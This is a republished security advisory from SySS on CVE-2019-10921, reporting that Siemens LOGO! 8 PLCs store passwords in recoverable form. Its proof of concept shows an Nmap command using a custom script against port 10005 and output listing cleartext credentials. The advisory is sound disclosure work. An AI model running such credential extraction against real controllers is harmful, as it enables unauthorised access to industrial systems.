Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMatthias DeegPACKETSTORM:153124
HistoryMay 29, 2019 - 12:00 a.m.

Siemens LOGO! 8 Recoverable Password Format

2019-05-2900:00:00
Matthias Deeg
packetstormsecurity.com
462

EPSS

0.006

Percentile

77.7%

JSON
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2019-014  
Product: LOGO!  
Manufacturer: Siemens  
Affected Version(s): LOGO! 8 (all versions)  
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03  
Vulnerability Type: Storing Passwords in a Recoverable Format (CWE-257)  
Risk Level: Medium  
Solution Status: Open  
Manufacturer Notification: 2019-04-04  
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)  
Public Disclosure: 2019-05-29  
CVE Reference: CVE-2019-10921  
Authors of Advisory: Manuel Stotz (SySS GmbH), Matthias Deeg (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Siemens LOGO! is a programmable logic controller (PLC) for small  
automation tasks.  
  
The manufacturer describes the product as follows (see [1]):  
  
"Simple installation, minimum wiring, user-friendly programming: You can  
easily implement small automation projects with LOGO!, the intelligent  
logic module from Siemens. The LOGO! Logic Module saves space in the  
control cabinet, and lets you easily implement functions, such as  
time-delay switches, time relays, counters and auxiliary relays. "  
  
Due to storing passwords in a recoverable format on LOGO! 8 PLCs, an  
attacker can gain access to configured passwords as cleartext.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
SySS GmbH found out that passwords are stored in a recoverable format on  
LOGO! 8 PLCs.  
  
Thus, if an attacker finds a way to retrieve this password data, for  
instance exploiting the security vulnerabilities described in the SySS  
security advisories SYSS-2019-012 [2] and SYSS-2019-013 [3], direct  
access to cleartext passwords is given.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
SySS GmbH could successfully extract sensitive data such as configured  
passwords as cleartext from a LOGO! 8 using a developed Nmap script.  
  
The following Nmap output exemplarily shows extracting cleartext  
password data from a LOGO! 8 PLC:  
  
$ nmap -p 10005 --script slig.nse 192.168.10.112  
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 17:21 CEST  
Nmap scan report for 192.168.10.112  
Host is up (0.00044s latency).  
  
PORT STATE SERVICE  
10005/tcp open stel  
| slig: Gathered Siemens LOGO!8 access details and passwords  
| User: LSCUser  
| Password: S3cret1  
| Enabled: True  
| User: AppUser  
| Password: S3cret2  
| Enabled: True  
| User: WebUser  
| Password: S3cret3  
| Enabled: True  
| User: TDUser  
| Password: S3cret4  
| Enabled: True  
| Protection: Password  
| Program password: SECRET  
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00  
  
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds  
  
A successful attack against a LOGO! 8 extracting all configured  
passwords is demonstrated in our SySS PoC video [7].  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
In the publicly released Siemens Security Advisory SSA-542701 [3],  
the manufacturer Siemens recommends to apply a defense-in-depth concept,  
including protection concept outlined in the system manual, as a  
mitigation for reducing the risk of the described security issue.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2019-04-04: Vulnerability reported to manufacturer  
2019-04-04: Manufacturer confirms receipt of security advisory and  
asks for referenced Nmap script  
2019-04-04: SySS provides PoC Nmap script  
2019-05-14: Public release of Siemens Security Advisory SSA-542701  
2019-05-29: Public release of SySS security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for Siemens LOGO!  
https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html  
[2] SySS Security Advisory SYSS-2019-012  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt  
[3] SySS Security Advisory SYSS-2019-013  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-013.txt  
[4] SySS Security Advisory SYSS-2019-014  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-014.txt  
[5] Siemens Security Advisory SSA-542701  
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf  
[6] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
[7] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"  
https://youtu.be/TpH4EABGYCs  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Manuel Stotz of SySS GmbH.  
  
E-Mail: manuel.stotz (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc  
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAlztdr8ACgkQ2aS/ajSt  
TasxbQ/+PJBnR7LHclINEMabNhgqI5k98QsHLesp+++pKtyJoBm/9znzMLkv9rUw  
nt8uRC2qlObbPMmnEMGSHGZU9wYATyo1e8jiv4X9Nxqa6XxuhApXa7un6ExDkrCm  
PDxQ0L8WmH6/gkpRqoijrhk+5n16sG5BtMRi/fwTHtz1GvpBAMIpuR+ZbgLmlqjW  
V2Ta/0ZMEUw7ANSL3WwPZa9uowuRfV6hAUWPRz5aP4KcxkoasE2WBz81kmc3GEYl  
cJ40pqE8hOTBC+fCgUElSLbmfr4tbDJw3u3KayAJA27Qu+IhBvrwEVGBsDb+MJ95  
wd553soH6ehILtthKVPrUU53jZWQrOjmqbu8mLG9oCAoaVIR9gsxnxJ5NohoIH+I  
vkvMo7RygY7GrBeWqPAZWm4N790PA3miKhDUrEgTJtTVb5bZ+h362K0AQD9PauAu  
nbR9Ui8ZDqr+64tCP00C2YkoMZKSkxdnwRdIEn/njcDfKgMi5JBbBQwRX9JiUOly  
b1QT+X9iaMEdIqzYmSMchEm4/FW5yox+Q0nFjkPiE/uGUmZFDKxdQr8bQcHisWXi  
HcecHC6aknlJwkhHduK4meC/935c1qcaR9DA3O18JdqaonlaU1PezkivK6Yy80u4  
XYUJ6umZh1gw/Ghx4+EorJqKnoZtaZWGVyTk0JKmIXa+AvWZV5w=  
=cc0p  
-----END PGP SIGNATURE-----  
`

Related

prion 1
cvelist 1
nvd 1
nessus 1
zdt 1
cve 1
ics 1
prion
prion
Security feature bypass
2019-05-14 20:29:00
cvelist
cvelist
CVE-2019-10921
2019-05-14 19:54:48
nvd
nvd
CVE-2019-10921
2019-05-14 20:29:02
nessus
nessus
Siemens LOGO! 8 BM Plaintext Storage of a Password (CVE-2019-10921)
2023-09-21 00:00:00
zdt
zdt
Siemens LOGO! 8 Recoverable Password Format Vulnerability
2019-05-29 00:00:00
cve
cve
CVE-2019-10921
2019-05-14 20:29:02
ics
ics
Siemens LOGO! 8 BM (Update A)
2020-12-08 12:00:00

EPSS

0.006

Percentile

77.7%

JSON
Related for PACKETSTORM:153124
prion1cvelist1nvd1nessus1zdt1cve1ics1